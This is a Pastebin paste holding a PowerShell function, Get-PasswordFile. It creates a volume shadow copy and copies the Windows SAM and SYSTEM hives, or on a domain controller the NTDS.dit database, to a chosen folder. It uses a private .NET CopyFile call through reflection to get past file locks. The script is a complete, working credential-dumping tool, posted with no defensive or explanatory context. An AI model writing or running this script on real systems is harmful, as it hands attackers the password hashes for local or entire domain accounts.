API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 29th, 2017
93
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.06 KB | None | 0 0
raw download clone embed print report
  1. function Get-PasswordFile {
  2. <#
  3. .SYNOPSIS
  4.  
  5. Copies either the SAM or NTDS.dit and system files to a specified directory.
  6.  
  7. .PARAMETER DestinationPath
  8.  
  9. Specifies the directory to the location where the password files are to be copied.
  10.  
  11. .OUTPUTS
  12.  
  13. None or an object representing the copied items.
  14.  
  15. .EXAMPLE
  16.  
  17. Get-PasswordFile "c:\temp"
  18.  
  19. #>
  20.  
  21. [CmdletBinding()]
  22. Param
  23. (
  24. [Parameter(Mandatory = $true, Position = 0)]
  25. [ValidateScript({Test-Path $_ -PathType 'Container'})]
  26. [ValidateNotNullOrEmpty()]
  27. [String]
  28. $DestinationPath
  29. )
  30.  
  31. #Define Copy-RawItem helper function from http://gallery.technet.microsoft.com/scriptcenter/Copy-RawItem-Private-NET-78917643
  32. function Copy-RawItem
  33. {
  34.  
  35. [CmdletBinding()]
  36. [OutputType([System.IO.FileSystemInfo])]
  37. Param (
  38. [Parameter(Mandatory = $True, Position = 0)]
  39. [ValidateNotNullOrEmpty()]
  40. [String]
  41. $Path,
  42.  
  43. [Parameter(Mandatory = $True, Position = 1)]
  44. [ValidateNotNullOrEmpty()]
  45. [String]
  46. $Destination,
  47.  
  48. [Switch]
  49. $FailIfExists
  50. )
  51.  
  52. # Get a reference to the internal method - Microsoft.Win32.Win32Native.CopyFile()
  53. $mscorlib = [AppDomain]::CurrentDomain.GetAssemblies() | ? {$_.Location -and ($_.Location.Split('\')[-1] -eq 'mscorlib.dll')}
  54. $Win32Native = $mscorlib.GetType('Microsoft.Win32.Win32Native')
  55. $CopyFileMethod = $Win32Native.GetMethod('CopyFile', ([Reflection.BindingFlags] 'NonPublic, Static'))
  56.  
  57. # Perform the copy
  58. $CopyResult = $CopyFileMethod.Invoke($null, @($Path, $Destination, ([Bool] $PSBoundParameters['FailIfExists'])))
  59.  
  60. $HResult = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
  61.  
  62. if ($CopyResult -eq $False -and $HResult -ne 0)
  63. {
  64. # An error occured. Display the Win32 error set by CopyFile
  65. throw ( New-Object ComponentModel.Win32Exception )
  66. }
  67. else
  68. {
  69. Write-Output (Get-ChildItem $Destination)
  70. }
  71. }
  72.  
  73. #Check for admin rights
  74. if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
  75. {
  76. Write-Error "Not running as admin. Run the script with elevated credentials"
  77. Return
  78. }
  79.  
  80. #Get "vss" service startup type
  81. $VssStartMode = (Get-WmiObject -Query "Select StartMode From Win32_Service Where Name='vss'").StartMode
  82. if ($VssStartMode -eq "Disabled") {Set-Service vss -StartUpType Manual}
  83.  
  84. #Get "vss" Service status and start it if not running
  85. $VssStatus = (Get-Service vss).status
  86. if ($VssStatus -ne "Running") {Start-Service vss}
  87.  
  88. #Check to see if we are on a DC
  89. $DomainRole = (Get-WmiObject Win32_ComputerSystem).DomainRole
  90. $IsDC = $False
  91. if ($DomainRole -gt 3) {
  92. $IsDC = $True
  93. $NTDSLocation = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\services\NTDS\Parameters)."DSA Database File"
  94. $FileDrive = ($NTDSLocation).Substring(0,3)
  95. } else {$FileDrive = $Env:HOMEDRIVE + '\'}
  96.  
  97. #Create a volume shadow filedrive
  98. $WmiClass = [WMICLASS]"root\cimv2:Win32_ShadowCopy"
  99. $ShadowCopy = $WmiClass.create($FileDrive, "ClientAccessible")
  100. $ReturnValue = $ShadowCopy.ReturnValue
  101.  
  102. if ($ReturnValue -ne 0) {
  103. Write-Error "Shadow copy failed with a value of $ReturnValue"
  104. Return
  105. }
  106.  
  107. #Get the DeviceObject Address
  108. $ShadowID = $ShadowCopy.ShadowID
  109. $ShadowVolume = (Get-WmiObject Win32_ShadowCopy | Where-Object {$_.ID -eq $ShadowID}).DeviceObject
  110.  
  111. #If not a DC, copy System and SAM to specified directory
  112. if ($IsDC -ne $true) {
  113.  
  114. $SamPath = Join-Path $ShadowVolume "\Windows\System32\Config\sam"
  115. $SystemPath = Join-Path $ShadowVolume "\Windows\System32\Config\system"
  116.  
  117. #Utilizes Copy-RawItem from Matt Graeber
  118. Copy-RawItem $SamPath "$DestinationPath\sam"
  119. Copy-RawItem $SystemPath "$DestinationPath\system"
  120. } else {
  121.  
  122. #Else copy the NTDS.dit and system files to the specified directory
  123. $NTDSPath = Join-Path $ShadowVolume "\Windows\NTDS\NTDS.dit"
  124. $SystemPath = Join-Path $ShadowVolume "\Windows\System32\Config\system"
  125.  
  126. Copy-RawItem $NTDSPath "$DestinationPath\ntds"
  127. Copy-RawItem $SystemPath "$DestinationPath\system"
  128. }
  129.  
  130. #Return "vss" service to previous state
  131. If ($VssStatus -eq "Stopped") {Stop-Service vss}
  132. If ($VssStartMode -eq "Disabled") {Set-Service vss -StartupType Disabled}
  133. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!